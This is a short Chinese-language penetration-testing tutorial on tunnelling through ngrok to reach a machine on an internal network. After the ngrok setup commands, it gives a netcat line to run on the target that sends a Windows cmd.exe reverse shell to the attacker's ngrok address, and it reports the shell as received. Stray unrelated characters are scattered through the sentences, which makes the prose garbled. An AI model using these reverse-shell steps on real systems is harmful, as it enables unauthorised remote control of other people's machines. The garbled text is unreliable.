0X00 前言
在滲透測試過程中,可能目標(biāo)主機是內(nèi)網(wǎng)里面的機器算途,由于外網(wǎng)無法直接訪問內(nèi)網(wǎng)煌妈,我們就需要反向代理,來為下一步的工作做準(zhǔn)備煤篙。
0X01 ngrok簡介
ngrok
是一個反向代理斟览,通過在公共的端點和本地運行的 Web 服務(wù)器之間建立一個安全的通道。ngrok
可捕獲和分析所有通道上的流量辑奈,便于后期分析和重放苛茂。
0X02 使用方法
先去官網(wǎng)注冊一個賬號,之后下載ngrok客戶端鸠窗,看你的主機是什么妓羊,我的是ubantu
的。
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken your authtoken
./ngrok help 查看使用幫助
./ngrok tcp 9998 獲得一個地址稍计,后面用nc發(fā)送目標(biāo)的shell或者cmd就是用這個地址
ngrok
在目標(biāo)機器執(zhí)行
nc -vv yourserver port -e c:\Windows\System32\cmd.exe
ngrok
成功收到cmd
shell